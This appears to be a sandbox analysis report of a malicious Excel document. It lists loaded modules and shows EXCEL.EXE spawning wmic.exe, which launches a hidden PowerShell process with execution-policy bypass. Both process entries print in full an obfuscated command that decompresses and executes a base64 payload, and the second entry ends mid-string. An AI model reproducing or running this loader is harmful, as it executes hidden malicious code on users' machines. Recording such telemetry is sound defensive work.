c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\winmm.dll

PID
3964
CMD
wMIc PROcEsS 'Call' CrEaTe "POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHAR]34 +"\" -f'TDcg1+tRAnwivi1'${P1LJ}'gKQGb24OMIdgBE'${P1LJ}'3Wydj4g4f++oScUgUoxmfHuxOKdq0uWhUHUTpb+qNH'${P1LJ}'LlnSVWBKqIIqKYkH/dWg9nJ4twYg1JJhVCUOTgt5X8YEVw1VpuERkSzsOooIxSkEFVJPSrisdaoyAc9'${P1LJ}'S7+cdYuRh10o0Py0ffdpzP3Jn6a6JnX1q2QEK45oM9p/zJ8'${P1LJ}'hBo8oyC0OrY'${P1LJ}'VR9DnaMSwbwz9BUYjq47FDs1Wj8ov8TaXYfoZU4kz0yudrbu1DbA+S7apq4ekJ7'${P1LJ}'Mx7A9MdnFyvU6ngUgST6mQhKBe31CJhjHCpMhNKDa1UItMxX1DiS'${P1LJ}'K+znkbp+nmvnFKOy/31NZcTt75wZnHJ5eVd'${P1LJ}'0w6cHT1GzBEhTxwpwR'${P1LJ}'C3PG'${P1LJ}'Y'${P1LJ}'kOxIVUD2sbydlw1E7FEiIqePymqRCrtVaepI4H'${P1LJ}'+BD'${P1LJ}'4WgVBZJqIl+awi'${P1LJ}'mGQ/yb5ZZZvZh/KO+rfOi0I4oUIUCnieJg/0AviDcd'${P1LJ}'lAD0jT2FRKChrD1X9OBkEAlc14K/QzHh+UAVZhFvEOJl6w3'${P1LJ}'//fjtt5/jmD69POPQr3m++PfM887F53sxt4V/yzx/xrF+5n'${P1LJ}'o'${P1LJ}'v1RfRptK'${P1LJ}'/ym4o+5zGJ7msayeQVoyIwtcSRARTHZGgYBoSNb/d55mp7YH3U'${P1LJ}'EckJmFRKWWKwwaHCTZd8UCnp1LrMquHBOsvtC/QDjDBALyEeAW2bGph34H'${P1LJ}'fjuOfRW'${P1LJ}'hsJEPEFc4n+SW8JErHVMm1r'${P1LJ}'eqJZo'${P1LJ}'hyPOgCCI/'${P1LJ}'aBn'${P1LJ}'sAKq1eYEit/p8DrWXQvlxYQ'${P1LJ}'QdlNu6WbidLaCtukvIadhI3DxE7vnLfCgyMJYz/8BnNlmIvgnPFaroJWG+zWgQozwDPE4qrpU8e9sd/'${P1LJ}'Y52fGqjS1XqXuoU1XSGjUInyIEJSyAJykMGB0yMaUnwNYn8YE4PygVvRn'${P1LJ}'1aY9Vru8q60M1FkvV440GZr'${P1LJ}'mZ62NGzAcuEJS+o9W0hab'${P1LJ}'W3E0qZ2gvfV'${P1LJ}'pVK1mXOMccYc9W'${P1LJ}'MPmp5VNljr5bc1ygkNt0gt6a2c5ZCeFIMoey5Ak0rt'${P1LJ}'mr/SmNN21P6azt0/s'${P1LJ}'pYbNcIcp/PMOgVLhYXczjSC'${P1LJ}'VnT4N3TBp'${P1LJ}'stQWp'${P1LJ}'uClW5E6YLXpBHYWDjec3WVnQsr1WAYM'${P1LJ}'2mMXDjPCb5svVYvQC32fRnuKILIgrXIJ9MPEn8OBCP7GZSqHILJJth/AICvpongM73pfeblbwKMdYCySOKmOXr6l1QTgdYAy10rbQ'${P1LJ}'T3Q1bjk1gTDzWJBMeoYdy+xHoXyRTqKv0IOCivDMseRM5mR2i2C6PJ2x0SCuTKDrhb'${P1LJ}'liixbU3cRSd26x5rior0qMcdv0T0I+FwjuCTs6qcMA4NNsh90vZL6EzlYM9B'${P1LJ}'MdxPRVGAkTJwTb1rAPWGA9gxWjirQphLqHxhyx3beLgB+HL68a5'${P1LJ}'SQ8T1LY3KM0QM/FQbxmvQilZPvuAtcz74g62PvKPLfXblY1pK+XuI/OzuPFobn'${P1LJ}'fvU'${P1LJ}'Lhd1iE30YC6dfuM'${P1LJ}'zwIl/K2vpbe0j8HbpzGG'${P1LJ}'BAgfn2wPZ5poK/rwhf'${P1LJ}'E'${P1LJ}'hNO2LJ0wz'${P1LJ}'Qjyy/Hqw/qRPKeY+18bapFROJY0LwQPhHS+aMHPedOLPECkap1LqXdlekASSlbx2BKXQP'${P1LJ}'rsiFwqR3fEPWk5DmszturOw0hgtgD'${P1LJ}'vckGox89fIxNp3VzUcf+PRq3s6ancHA3am'${P1LJ}'U4h264VL0'${P1LJ}'JrJEFWs6V4YvzoHOPw5kOFFNDV9hgE8cgIYVVOlpYtZlb92mM1eTewELuCZ4kQLPsQTAccu8'${P1LJ}'XDwFksRG2cWC66T6I+HaJ'${P1LJ}'zfyS82nScXds5ZpkjcP8zyCeAex4kVXLWQIZjDLH8aUQaR'${P1LJ}'UKhDxtYhLtKy'${P1LJ}'Mr6R+fq34IhhCmjFta1hBIbnGLKOxkR3h2zNcMzV'${P1LJ}'0'${P1LJ}'C7vu8/77kz9+U7NuzsPy68BUz++K3wyqeh+8LwzHTnv39'${P1LJ}'4nwUh'${P1LJ}'t5WlzUID7neaz5UfuyZuc'${P1LJ}'6/TH8+o7p1E8e'${P1LJ}'v/rP//jbf71++3lez/3Z12PZfv74/X9+/OV//+Px1+uf/+m3H3/xz3/6l3/49z8P/zWMv//vj99//O'${P1LJ}'CCXQy6RdEVTRKnIH4pje2482y/VdiSVqeWn'${P1LJ}'DAvfCRAt/uzxkDw8zhlRD6RjB+fVrpg0zaMf3yYqepy5rHB'${P1LJ}'DLE4ar+SkehEns0oNegAPjJSnL0xdEvKLVmPezMgI4RHJ'${P1LJ}'aQOqnvJuJZx'${P1LJ}'KDUe3ohYKtVlFPGcWHxsYrbJxVVAK3owbGCGrkkQ/rCZub'${P1LJ}'z+/LMw/3H++WP'${P1LJ}'pTLaCK76XdrBgK2IxT'${P1LJ}'RerDZeZN28GlEnuJo/YmtpE+pq8IL0'${P1LJ}'9gHWgZ'${P1LJ}'40qQDWuRH5wTjp82ITMWtrOUgtMgDauSyL'${P1LJ}'9Pm55II0Gpv'${P1LJ}'4ygMr+JmbTH1DdYySagU9VKc2N0W4ueg08vOw2nhD3mD7rPgIoTp'${P1LJ}'t27p68232sJu1le7aGT0mFqOOtMcrOYiS6tyqQ8wzGG3CeJTFxj6r7uWOF2JmnuCATwsQJJcUrVM6WQUz+J5AUajSqfO/MFZsBQUCjUXw6Nc0TC4NGhldTtK3SB32sUpSra10em3vobWXnEqYhyRmTmcK1g3iqQ4B3mbex'${P1LJ}'J8ou+PsrXwNVZz/hFnkArS9zcdRUC6WP9gIympSM9E1WZIf+9wmkJWTx1S0QHwurtihWwDqsCDg53F5WJ9tUNvuMaj8ab8q'${P1LJ}'skQ0THyQyUjisGjHcYKIQu2+mzue17frRoF4IGBo+DTMitXmC0WhhilDxb5O+R3LjEyZtHg9D'${P1LJ}'77jD95DtT16Tj'${P1LJ}'tbQDc97dhPNrz2Oh2jwdsXZ0DkCcOhOYkdWTEEyuTEm+2aIM46X/KoqDrxavt+vkmQyT4iu+GpqS8PP'${P1LJ}'MArjhRGNYg2F9VfdPa4BqoVHYAkxju0O8J1R4'${P1LJ}'/xOV2JPU7rfD9acPrw7eLf60Hh/H3KIRKandHpnalfO3JV4dvqkdua'${P1LJ}'Z'${P1LJ}'aWcwRJAr6q+ND1TrC'${P1LJ}'qKSY'${P1LJ}'ljPb4xeeFL3DvLcMrADgToT5aLUox5CllA+JXEQMW/bOC17LZal1S/zNa1BdPXO5Yn'${P1LJ}'YlGLa5n3NN4zV/onjR+uM84xtycNJwGJjx/e1'${P1LJ}'C+cNjhgjs/34BpnxC+hIJvyQ4B4RjqblKVZHTc3rAbGM64ZBbb+zzY+XckwZ6OlcLdRbobQidoeXmecN8UzCG++X3fMStA3U9dY0GWN5/vtcnRWXJxugwwTOazOCBDpmJgzhyzH+LFAIuVq8FiUxa9QYwRH'${P1LJ}'0vVgFpa2Dqb60+4DsVhjetBg3Zg7ldJXarU'${P1LJ}'pu'${P1LJ}'7elXIf7joC2nzLIjXD'${P1LJ}'113'${P1LJ}'3H5jY2cnxvY/4jte27oI2XefoVzjsXP7hiUpZQz+8QrOb8Pn/l+v+3G8j5V5'${P1LJ}'fgK'${P1LJ}'L1h9u4oNV+ssq3TkkiNlVN/'${P1LJ}'mngMiT+T16ZyqSTvHBZWOD'${P1LJ}'/hwOl+nzw/HjSN1YOHgKqFpt7rRZGWT/BIiJkyF95SswPDL3pxW7zJDiT4/BO'${P1LJ}'F+kmm9Sj1Kubr0qsBEUpYmKxgI/s03HN7y'${P1LJ}'C6O6QtCbh5ea89M74ka+QdBqHs2q11FMwFGtWqFV1e6HSgtgjeR7lhTr7IqWU'${P1LJ}'BVvidIOK5k4r+WAGmnlxUDDZ+8A'${P1LJ}'5DpV7h623k5v23FYeOeaZf2X1kenm40/rG6OleqdxnxtzlXtuWxrWNG7c9esDZq/nzI0DSznTuMxOl+7WuP1Kk5'${P1LJ}'7XoIbvKvNgn4H/YGe+p'${P1LJ}'xjDEtC82gNa'${P1LJ}'lv/n7/ux8/uev/AA=='${P1LJ}'s+efp89/SktmdfxW0Lq8nD/s'${P1LJ}'G'${P1LJ}'+elVnRyixanAvVNCqUeWr/6qBbTJdR2B'${P1LJ}'QXVMU'${P1LJ}'xmwnTgfsbjzOwolxBVmLrwiAkHRV9m5lHiVtHgqNwTinMuUR0kjvZgSTrbantkN6opXWeotL8uZhGv0FtBuHNYf2clhLCAi+s+UXf3'${P1LJ}'BPMXYpuPdxfWretc6RGXx7Bogz1cr4Y3yqXf'${P1LJ}'dDRPD6znvkdH'${P1LJ}'2COWZo4ll4X'${P1LJ}'oledVOE'${P1LJ}'SWdtZx6vWs6St5U9szY8YgwmSUXh+3c+gmS2STj5ue6yTdS+d6QZvHR6iwUeMunhHrHDMRzOg5'${P1LJ}'rjo/H3SOZT376G3489pmTt+cbx0quZ0lhpVkXWL'${P1LJ}'VdZ8nxoAeDhYxif'${P1LJ}'Ta'${P1LJ}'smpPqleLDVN/N17Y4EDk'${P1LJ}'myREzVBnwx7uDI6MNK7vDoTB/DjoIPMVJFY+WZpkvYW/fFEj1MCdXLkag2FS'${P1LJ}'FEVe3xPIpM8L7FaLMH3d/WJPfFaY6jyYzH2xOrGEMAtVoo/Au3dAf2'${P1LJ}'RZlLy+xaV4X'${P1LJ}'Wn3OHKr158YIH+YhvvT'${P1LJ}'RMFmDDU4H'${P1LJ}'Ftxk1GpFQ1MDW29U5N3LmWU5cjGMuwEbzFklE3vtJBDs345aQXGCMG6pD4FBNEh8hWzmV0s6qUBWxsOaIq+tf4qvRiMCYD51Fm'${P1LJ}'DqUse79TOVvc1k/+Jt'${P1LJ}'Jeg1QkTtO'${P1LJ}'HDZIUxb1Upq5b72'${P1LJ}'ANiT'${P1LJ}'pl6Ab/Ul/Q+8Ni'${P1LJ}'WoMBAq/AzgAC52'${P1LJ}'DYT3xkbXHqQHJxY7RetKDmXLNhGIdncQAhgUI+nPlOJwAh8aVwut2uUFAIazhR+2GXuMwvj7fv1dQ3RCnJ29D5+neGcY+QvoKI4lvHiTpFAkQ+kBDAeBPG43vGSUTyp+C'${P1LJ}'Yb8U0AO'${P1LJ}'pobXQlFYAQZrk7VZCBRx'${P1LJ}'0iKx2qmtGkAJ0mWIHrMo5mCtHPIzRU'${P1LJ}'WB02tamqyBYxBguYwAKG3ODN1FzokGE4G+Na/Lco0TyoaZHEzNYucVD'${P1LJ}'UMjO26uW0kHU'${P1LJ}'K'${P1LJ}'dqLrYJrRtIo2IiY3AjXAw/tYkxoEQbJXMjzOR8cJGvoFXdaFskKgqRtSzQkLG5H'${P1LJ}'EbIbAuWxUgH+SxcIS7/D569BXmIC1mEmXFXUyS0CJhOyOMk0a2mUTrxlw4hK7GzDOwzVTV8HPqs1SvvEB'${P1LJ}'4PndanggOs'${P1LJ}'dgNb60HSGCzUsegUaz606Qvk'${P1LJ}'+16eAuhhiWuLbN7azlTHWtE1f2uLKO43ClerRp4ealzUtpbIspzjStfj60rc1HaXtJV+lbLHJe'${P1LJ}'n'${P1LJ}'v0HgRjbVAhcB/HEnufjty3TDa1YcPRbameULFZ18eWW5wyzzNL82ut+OvJRx9kVg+S'${P1LJ}'o7F1rrvkFVSHMjc0aIpUA62v8Z0rCfGEvjuad4Dg'${P1LJ}'YQF5FElH0sCLG7hlsIjAck7GuVo7ONcdHiiRxCxGg26eSh'${P1LJ}'GwzhWpfg95fIaSOo7'${P1LJ}'n8fGN0icbm/Afpb1Rk+zTIu1Jw'${P1LJ}'+nzi')) ${P1LJ}[iO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')"
Path
C:\Windows\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2752
CMD
POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHAR]34 +"\" -f'TDcg1+tRAnwivi1'${P1LJ}'gKQGb24OMIdgBE'${P1LJ}'3Wydj4g4f++oScUgUoxmfHuxOKdq0uWhUHUTpb+qNH'${P1LJ}'LlnSVWBKqIIqKYkH/dWg9nJ4twYg1JJhVCUOTgt5X8YEVw1VpuERkSzsOooIxSkEFVJPSrisdaoyAc9'${P1LJ}'S7+cdYuRh10o0Py0ffdpzP3Jn6a6JnX1q2QEK45oM9p/zJ8'${P1LJ}'hBo8oyC0OrY'${P1LJ}'VR9DnaMSwbwz9BUYjq47FDs1Wj8ov8TaXYfoZU4kz0yudrbu1DbA+S7apq4ekJ7'${P1LJ}'Mx7A9MdnFyvU6ngUgST6mQhKBe31CJhjHCpMhNKDa1UItMxX1DiS'${P1LJ}'K+znkbp+nmvnFKOy/31NZcTt75wZnHJ5eVd'${P1LJ}'0w6cHT1GzBEhTxwpwR'${P1LJ}'C3PG'${P1LJ}'Y'${P1LJ}'kOxIVUD2sbydlw1E7FEiIqePymqRCrtVaepI4H'${P1LJ}'+BD'${P1LJ}'4WgVBZJqIl+awi'${P1LJ}'mGQ/yb5ZZZvZh/KO+rfOi0I4oUIUCnieJg/0AviDcd'${P1LJ}'lAD0jT2FRKChrD1X9OBkEAlc14K/QzHh+UAVZhFvEOJl6w3'${P1LJ}'//fjtt5/jmD69POPQr3m++PfM887F53sxt4V/yzx/xrF+5n'${P1LJ}'o'${P1LJ}'v1RfRptK'${P1LJ}'/ym4o+5zGJ7msayeQVoyIwtcSRARTHZGgYBoSNb/d55mp7YH3U'${P1LJ}'EckJmFRKWWKwwaHCTZd8UCnp1LrMquHBOsvtC/QDjDBALyEeAW2bGph34H'${P1LJ}'fjuOfRW'${P1LJ}'hsJEPEFc4n+SW8JErHVMm1r'${P1LJ}'eqJZo'${P1LJ}'hyPOgCCI/'${P1LJ}'aBn'${P1LJ}'sAKq1eYEit/p8DrWXQvlxYQ'${P1LJ}'QdlNu6WbidLaCtukvIadhI3DxE7vnLfCgyMJYz/8BnNlmIvgnPFaroJWG+zWgQozwDPE4qrpU8e9sd/'${P1LJ}'Y52fGqjS1XqXuoU1XSGjUInyIEJSyAJykMGB0yMaUnwNYn8YE4PygVvRn'${P1LJ}'1aY9Vru8q60M1FkvV440GZr'${P1LJ}'mZ62NGzAcuEJS+o9W0hab'${P1LJ}'W3E0qZ2gvfV'${P1LJ}'pVK1mXOMccYc9W'${P1LJ}'MPmp5VNljr5bc1ygkNt0gt6a2c5ZCeFIMoey5Ak0rt'${P1LJ}'mr/SmNN21P6azt0/s'${P1LJ}'pYbNcIcp/PMOgVLhYXczjSC'${P1LJ}'VnT4N3TBp'${P1LJ}'stQWp'${P1LJ}'uClW5E6YLXpBHYWDjec3WVnQsr1WAYM'${P1LJ}'2mMXDjPCb5svVYvQC32fRnuKILIgrXIJ9MPEn8OBCP7GZSqHILJJth/AICvpongM73pfeblbwKMdYCySOKmOXr6l1QTgdYAy10rbQ'${P1LJ}'T3Q1bjk1gTDzWJBMeoYdy+xHoXyRTqKv0IOCivDMseRM5mR2i2C6PJ2x0SCuTKDrhb'${P1LJ}'liixbU3cRSd26x5rior0qMcdv0T0I+FwjuCTs6qcMA4NNsh90vZL6EzlYM9B'${P1LJ}'MdxPRVGAkTJwTb1rAPWGA9gxWjirQphLqHxhyx3beLgB+HL68a5'${P1LJ}'SQ8T1LY3KM0QM/FQbxmvQilZPvuAtcz74g62PvKPLfXblY1pK+XuI/OzuPFobn'${P1LJ}'fvU'${P1LJ}'Lhd1iE30YC6dfuM'${P1LJ}'zwIl/K2vpbe0j8HbpzGG'${P1LJ}'BAgfn2wPZ5poK/rwhf'${P1LJ}'E'${P1LJ}'hNO2LJ0wz'${P1LJ}'Qjyy/Hqw/qRPKeY+18bapFROJY0LwQPhHS+aMHPedOLPECkap1LqXdlekASSlbx2BKXQP'${P1LJ}'rsiFwqR3fEPWk5DmszturOw0hgtgD'${P1LJ}'vckGox89fIxNp3VzUcf+PRq3s6ancHA3am'${P1LJ}'U4h264VL0'${P1LJ}'JrJEFWs6V4YvzoHOPw5kOFFNDV9hgE8cgIYVVOlpYtZlb92mM1eTewELuCZ4kQLPsQTAccu8'${P1LJ}'XDwFksRG2cWC66T6I+HaJ'${P1LJ}'zfyS82nScXds5ZpkjcP8zyCeAex4kVXLWQIZjDLH8aUQaR'${P1LJ}'UKhDxtYhLtKy'${P1LJ}'Mr6R+fq34IhhCmjFta1hBIbnGLKOxkR3h2zNcMzV'${P1LJ}'0'${P1LJ}'C7vu8/77kz9+U7NuzsPy68BUz++K3wyqeh+8LwzHTnv39'${P1LJ}'4nwUh'${P1LJ}'t5WlzUID7neaz5UfuyZuc'${P1LJ}'6/TH8+o7p1E8e'${P1LJ}'v/rP//jbf71++3lez/3Z12PZfv74/X9+/OV//+Px1+uf/+m3H3/xz3/6l3/49z8P/zWMv//vj99//O'${P1LJ}'CCXQy6RdEVTRKnIH4pje2482y/VdiSVqeWn'${P1LJ}'DAvfCRAt/uzxkDw8zhlRD6RjB+fVrpg0zaMf3yYqepy5rHB'${P1LJ}'DLE4ar+SkehEns0oNegAPjJSnL0xdEvKLVmPezMgI4RHJ'${P1LJ}'aQOqnvJuJZx'${P1LJ}'KDUe3ohYKtVlFPGcWHxsYrbJxVVAK3owbGCGrkkQ/rCZub'${P1LJ}'z+/LMw/3H++WP'${P1LJ}'pTLaCK76XdrBgK2IxT'${P1LJ}'RerDZeZN28GlEnuJo/YmtpE+pq8IL0'${P1LJ}'9gHWgZ'${P1LJ}'40qQDWuRH5wTjp82ITMWtrOUgtMgDauSyL'${P1LJ}'9Pm55II0Gpv'${P1LJ}'4ygMr+JmbTH1DdYySagU9VKc2N0W4ueg08vOw2nhD3mD7rPgIoTp'${P1LJ}'t27p68232sJu1le7aGT0mFqOOtMcrOYiS6tyqQ8wzGG3CeJTFxj6r7uWOF2JmnuCATwsQJJcUrVM6WQUz+J5AUajSqfO/MFZsBQUCjUXw6Nc0TC4NGhldTtK3SB32sUpSra10em3vobWXnEqYhyRmTmcK1g3iqQ4B3mbex'${P1LJ}'J8ou+PsrXwNVZz/hFnkArS9zcdRUC6WP9gIympSM9E1WZIf+9wmkJWTx1S0QHwurtihWwDqsCDg53F5WJ9tUNvuMaj8ab8q'${P1LJ}'skQ0THyQyUjisGjHcYKIQu2+mzue17frRoF4IGBo+DTMitXmC0WhhilDxb5O+R3LjEyZtHg9D'${P1LJ}'77jD95DtT16Tj'${P1LJ}'tbQDc97dhPNrz2Oh2jwdsXZ0DkCcOhOYkdWTEEyuTEm+2aIM46X/KoqDrxavt+vkmQyT4iu+GpqS8PP'${P1LJ}'MArjhRGNYg2F9VfdPa4BqoVHYAkxju0O8J1R4'${P1LJ}'/xOV2JPU7rfD9acPrw7eLf60Hh/H3KIRKandHpnalfO3JV4dvqkdua'${P1LJ}'Z'${P1LJ}'aWcwRJAr6q+ND1TrC'${P1LJ}'qKSY'${P1LJ}'ljPb4xeeFL3DvLcMrADgToT5aLUox5CllA+JXEQMW/bOC17LZal1S/zNa1BdPXO5Yn'${P1LJ}'YlGLa5n3NN4zV/onjR+uM84xtycNJwGJjx/e1'${P1LJ}'C+cNjhgjs/34BpnxC+hIJvyQ4B4RjqblKVZHTc3rAbGM64ZBbb+zzY+XckwZ6OlcLdRbobQidoeXmecN8UzCG++X3fMStA3U9dY0GWN5/vtcnRWXJxugwwTOazOCBDpmJgzhyzH+LFAIuVq8FiUxa9QYwRH'${P1LJ}'0vVgFpa2Dqb60+4DsVhjetBg3Zg7ldJXarU'${P1LJ}'pu'${P1LJ}'7elXIf7joC2nzLIjXD'${P1LJ}'113'${P1LJ}'3H5jY2cnxvY/4jte27oI2XefoVzjsXP7hiUpZQz+8QrOb8Pn/l+v+3G8j5V5'${P1LJ}'fgK'${P1LJ}'L1h9u4oNV+ssq3TkkiNlVN/'${P1LJ}'mngMiT+T16ZyqSTvHBZWOD'${P1LJ}'/hwOl+nzw/HjSN1YOHgKqFpt7rRZGWT/BIiJkyF95SswPDL3pxW7zJDiT4/BO'${P1LJ}'F+kmm9Sj1Kubr0qsBEUpYmKxgI/s03HN7y'${P1LJ}'C6O6QtCbh5ea89M74ka+QdBqHs2q11FMwFGtWqFV1e6HSgtgjeR7lhTr7IqWU'${P1LJ}'BVvidIOK5k4r+WAGmnlxUDDZ+8A'${P1LJ}'5DpV7h623k5v23FYeOeaZf2X1kenm40/rG6OleqdxnxtzlXtuWxrWNG7c9esDZq/nzI0DSznTuMxOl+7WuP1Kk5'${P1LJ}'7XoIbvKvNgn4H/YGe+p'${P1LJ}'xjDEtC82gNa'${P1LJ}'lv/n7/ux8/uev/AA=='${P1LJ}'s+efp89/SktmdfxW0Lq8nD/s'${P1LJ}'G'${P1LJ}'+elVnRyixanAvVNCqUeWr/6qBbTJdR2B'${P1LJ}'QXVMU'${P1LJ}'xmwnTgfsbjzOwolxBVmLrwiAkHRV9m5lHiVtHgqNwTinMuUR0kjvZgSTrbantkN6opXWeotL8uZhGv0FtBuHNYf2clhLCAi+s+UXf3'${P1LJ}'BPMXYpuPdxfWretc6RGXx7Bogz1cr4Y3yqXf'${P1LJ}'dDRPD6znvkdH'${P1LJ}'2COWZo4ll4X'${P1LJ}'oledVOE'${P1LJ}'SWdtZx6vWs6St5U9szY8YgwmSUXh+3c+gmS2STj5ue6yTdS+d6QZvHR6iwUeMunhHrHDMRzOg5'${P1LJ}'rjo/H3SOZT376G3489pmTt+cbx0quZ0lhpVkXWL'${P1LJ}'VdZ8nxoAeDhYxif'${P1LJ}'Ta'${P1LJ}'smpPqleLDVN/N17Y4EDk'${P1LJ}'myREzVBnwx7uDI6MNK7vDoTB/DjoIPMVJFY+WZpkvYW/fFEj1MCdXLkag2FS'${P1LJ}'FEVe3xPIpM8L7FaLMH3d/WJPfFaY6jyYzH2xOrGEMAtVoo/Au3dAf2'${P1LJ}'RZlLy+xaV4X'${P1LJ}'Wn3OHKr158YIH+YhvvT'${P1LJ}'RMFmDDU4H'${P1LJ}'Ftxk1GpFQ1MDW29U5N3LmWU5cjGMuwEbzFklE3vtJBDs345aQXGCMG6pD4FBNEh8hWzmV0s6qUBWxsOaIq+tf4qvRiMCYD51Fm'${P1LJ}'DqUse79TOVvc1k/+Jt'${P1LJ}'Jeg1QkTtO'${P1LJ}'HDZIUxb1Upq5b72'${P1LJ}'ANiT'${P1LJ}'pl6Ab/Ul/Q+8Ni'${P1LJ}'WoMBAq/AzgAC52'${P1LJ}'DYT3xkbXHqQHJxY7RetKDmXLNhGIdncQAhgUI+nPlOJwAh8aVwut2uUFAIazhR+2GXuMwvj7fv1dQ3RCnJ29D5+neGcY+QvoKI4lvHiTpFAkQ+kB